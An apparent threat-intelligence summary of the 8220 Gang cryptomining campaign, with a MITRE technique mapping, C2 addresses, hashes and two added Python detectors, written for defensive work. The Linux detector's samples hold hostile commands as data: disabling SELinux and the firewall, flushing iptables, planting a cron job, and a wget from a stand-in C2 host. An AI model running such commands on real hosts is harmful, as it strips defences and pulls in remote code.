The 8220 Gang, a China-based threat actor, targeted cloud-based infrastructure across Windows and Linux in a May 2023–February 2024 campaign, exploiting the known vulnerabilities CVE-2021-44228 and CVE-2022-26134. They employed multi-stage cryptomining operations with robust defense evasion techniques, including PowerShell fileless execution on Windows, DLL sideloading, UAC bypass, AMSI/ETW patching, and Linux shell-script persistence.
Key points
- The 8220 Gang is a Chinese-based threat group intensifying its focus on cloud infrastructure, affecting both Linux and Windows environments.
- Initial access leveraged known vulnerabilities CVE-2021-44228 (Log4Shell) and CVE-2022-26134 to compromise targets.
- Windows activity features PowerShell-based fileless execution, DLL sideloading, UAC bypass, and AMSI/ETW evasion to deploy cryptomining.
- Linux activity relies on a shell-script downloader with defense evasion (SELinux disabled, firewall disabled, iptables rules relaxed) and reconnaissance via masscan/spirit.
- Cryptomining operations involve multiple stages, startup persistence, and process injection (AddInProcess.exe) to run miners.
- Discovery and lateral movement combine masscan/spirit for network reach, SSH brute force, and automated SSH climbing using multiple keys and histories.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Exploitation of CVE-2021-44228 and CVE-2022-26134 to gain initial access. “exploiting well-known vulnerabilities…”
- [T1595] Active Scanning – Internet scans identify vulnerable applications as entry points. “By leveraging internet scans for vulnerable applications…”
- [T1059.001] PowerShell – Windows Stage 1 uses PowerShell for fileless execution. “The utilization of Windows PowerShell for fileless execution…”
- [T1574.002] DLL Side-Loading – Stage 1/3 use DLL sideloading (propsys.dll) to bypass defenses. “DLL sideloading…”
- [T1548.002] Bypass User Account Control – UAC bypass used during Windows Stage 3/4 workflow. “UAC bypass mechanism…”
- [T1562.001] Disable or Modify Tools – Patch AMSI/ETW to evade detection. “patching EtwEventWrite and AmsiScanBuffer…”
- [T1055] Process Injection – Stage 4 loads a payload into AddInProcess.exe for mining. “Process injection in AddInProcess.exe…”
- [T1543.003] Create or Modify System Process: Windows Service – Persistence via new service. “Persistence: The script creates service to maintain persistence.”
- [T1053.005] Cron – Linux persistence via cron jobs. “Deployed multiple cron jobs…”
- [T1021.004] SSH – Lateral movement via SSH and automated connections using keys. “Automates SSH connections to various hosts…”
- [T1110] Brute Force – Lateral movement uses brute force attempts against susceptible hosts. “brute force attacks (uses p.lst md5: 3cd84…)”
- [T1105] Ingress Tool Transfer – The downloader uses multiple methods to download payloads (wget, curl, lwp-download, Python urllib). “The payload is downloaded from two sets of C2…”
- [T1027] Obfuscated Files and Information – Batch scripts are obfuscated and payloads are decrypted/decompressed. “Highly Obfuscated script” and “AES decrypted and GZIP decompression.”
- [T1562.004] Impair Defenses: Disable or Modify System Firewall – Linux defense evasion includes disabling UFW/iptables protections. “Disables firewall via UFW disable.”
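The Linux techniques listed above (SELinux disabled, firewall disabled, iptables relaxed, cron persistence, multi-tool downloads) are behaviours rather than file names, so they can be caught on a host even when the payload is renamed. The following is an added example of that kind of behavioural detection; it is not code from the original report or from Uptycs. It runs over constructed sample command lines standing in for an auditd execve log or a recovered shell history, and the rule names, regexes and the two-technique threshold are assumptions of this example.

```python
import re

# Constructed sample shell commands (not real telemetry), standing in for what an
# auditd execve record or a recovered shell history would contain.
SAMPLE_COMMANDS = [
    "setenforce 0",
    "ufw disable",
    "iptables -F",
    "(crontab -l 2>/dev/null; echo '*/10 * * * * /tmp/update.sh') | crontab -",
    "wget -q -O /tmp/update.sh http://c2.example.invalid/update.sh",
    "ls -la /var/log",
]

# (technique id, description, pattern). The patterns target the behaviours named
# in the technique list rather than specific payload names, so they survive
# renamed droppers. Rule set and wording are this example's own.
RULES = [
    ("T1562.001", "SELinux switched to permissive mode",
     re.compile(r"\bsetenforce\s+0\b")),
    ("T1562.004", "host firewall disabled (ufw)",
     re.compile(r"\bufw\s+disable\b")),
    ("T1562.004", "iptables rules flushed",
     re.compile(r"\biptables\s+(?:-F|--flush)(?!\S)")),
    ("T1053.005", "crontab rewritten from stdin",
     re.compile(r"\bcrontab\s+-(?!\S)")),          # 'crontab -' but not 'crontab -l'
    ("T1105", "download utility invoked",
     re.compile(r"(?:^|[;&|]\s*)(?:wget|curl|lwp-download)\b")),
]


def scan_commands(commands):
    """Return (technique, description, command) for every rule a command trips."""
    findings = []
    for cmd in commands:
        for tid, desc, pattern in RULES:
            if pattern.search(cmd):
                findings.append((tid, desc, cmd))
    return findings


def techniques_seen(findings):
    """Distinct ATT&CK technique ids present in the findings."""
    return {tid for tid, _, _ in findings}


def host_is_suspicious(findings, min_techniques=2):
    """Any one command here can be an administrator's; several distinct
    techniques in one session match the chained evasion + persistence +
    download pattern described for the Linux downloader."""
    return len(techniques_seen(findings)) >= min_techniques


if __name__ == "__main__":
    hits = scan_commands(SAMPLE_COMMANDS)
    for tid, desc, cmd in hits:
        print(f"{tid:10} {desc:40} <- {cmd}")
    print("suspicious host:", host_is_suspicious(hits))
```

The threshold matters in practice: `ufw disable` on its own is routine change-management noise, whereas SELinux going permissive, the firewall dropping, a cron entry being written and a downloader running in the same session is the sequence the report describes, so alerting on the combination keeps the false-positive rate manageable.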
Indicators of Compromise
- [IP Address] – Entry/C2: 51.255.171.23, 217.182.205.238, 89.185.85.102, 178.62.234.229, 159.223.201.180
- [MD5 Hash] – Known miners and loaders: 29263792b788ecfa9f4e29699ed8ab61, 63a86932a5bad5da32ebd1689aa814b3, 915aec68a5b53aa7681a461a122594d9
- [File Name] – Network99717Man.cmd, YCWNEP, propsys.dll, ComputerDefaults.exe, AddInProcess.exe
- [Process] – AddInProcess.exe, powershell.exe, deliver.cmd
- [Port] – Cryptomining-related ports: 3333, 4444, 5555, 7777, 9000
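The indicators above are of very different quality: the C2 addresses and MD5 hashes are specific to this campaign, the mining ports are shared with plenty of legitimate traffic, and several of the file names (propsys.dll, ComputerDefaults.exe, AddInProcess.exe) are Microsoft binaries that are only suspicious outside their normal directories. The following is an added example of a triage matcher that ranks hits accordingly; it is not code from the original report or from Uptycs. The event schema, the constructed sample events, the legitimate-directory list and the severity tiers are assumptions of this example; the indicator values themselves are the ones listed above.

```python
# Indicator values taken from the list above.
IOC_IPS = {"51.255.171.23", "217.182.205.238", "89.185.85.102",
           "178.62.234.229", "159.223.201.180"}
IOC_MD5 = {"29263792b788ecfa9f4e29699ed8ab61", "63a86932a5bad5da32ebd1689aa814b3",
           "915aec68a5b53aa7681a461a122594d9"}
IOC_FILENAMES = {n.lower() for n in ("Network99717Man.cmd", "YCWNEP", "propsys.dll",
                                     "ComputerDefaults.exe", "AddInProcess.exe",
                                     "deliver.cmd")}
IOC_PORTS = {3333, 4444, 5555, 7777, 9000}

# Assumed: Microsoft-shipped names in these directories are the genuine binaries;
# the same names elsewhere (sideloaded propsys.dll, a copied ComputerDefaults.exe)
# are what the file-name indicators are really about.
LEGIT_DIRS = ("c:/windows/system32/", "c:/windows/microsoft.net/")

# Constructed sample events (not real telemetry): a mix of network and process records.
SAMPLE_EVENTS = [
    {"id": 1, "type": "network", "dst_ip": "51.255.171.23", "dst_port": 80,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"id": 2, "type": "network", "dst_ip": "10.0.0.5", "dst_port": 4444,
     "image": r"C:\Windows\System32\svchost.exe"},
    {"id": 3, "type": "process", "md5": "29263792B788ECFA9F4E29699ED8AB61",
     "image": r"C:\Windows\Temp\YCWNEP"},
    {"id": 4, "type": "process", "md5": "0" * 32,
     "image": r"C:\Users\Public\ComputerDefaults.exe"},
    {"id": 5, "type": "process", "md5": "1" * 32,
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe"},
    {"id": 6, "type": "network", "dst_ip": "203.0.113.9", "dst_port": 443,
     "image": r"C:\Program Files\Browser\browser.exe"},
]


def normalize_path(path):
    return path.replace("\\", "/").lower()


def match_event(ev):
    """Return a list of (indicator type, value) pairs the event matches."""
    hits = []
    if ev.get("dst_ip") in IOC_IPS:
        hits.append(("ip", ev["dst_ip"]))
    if ev.get("dst_port") in IOC_PORTS:
        hits.append(("port", str(ev["dst_port"])))
    md5 = (ev.get("md5") or "").lower()
    if md5 in IOC_MD5:
        hits.append(("md5", md5))
    image = ev.get("image")
    if image:
        norm = normalize_path(image)
        name = norm.rsplit("/", 1)[-1]
        if name in IOC_FILENAMES and not norm.startswith(LEGIT_DIRS):
            hits.append(("filename", name))
    return hits


def severity(hits):
    """Rank by indicator quality: C2 address or hash is conclusive, an
    out-of-place file name needs review, a mining port alone is only a hint."""
    kinds = {kind for kind, _ in hits}
    if kinds & {"ip", "md5"}:
        return "high"
    if "filename" in kinds:
        return "medium"
    if "port" in kinds:
        return "low"
    return None


def triage(events):
    """Bucket event ids by severity; events with no hit are dropped."""
    buckets = {"high": [], "medium": [], "low": []}
    for ev in events:
        sev = severity(match_event(ev))
        if sev:
            buckets[sev].append(ev["id"])
    return buckets


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["id"], severity(match_event(ev)), match_event(ev))
    print(triage(SAMPLE_EVENTS))
```

Event 5 is the point of the legitimate-directory check: AddInProcess.exe is the report's injection target, but the copy under Microsoft.NET is the genuine binary, so its name alone should not page anyone; the hash, a parent process of powershell.exe, or a connection to one of the listed addresses is what turns it into a finding.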
Read more: https://www.uptycs.com/blog/8220-gang-cryptomining-cloud-based-infrastructure-cyber-threat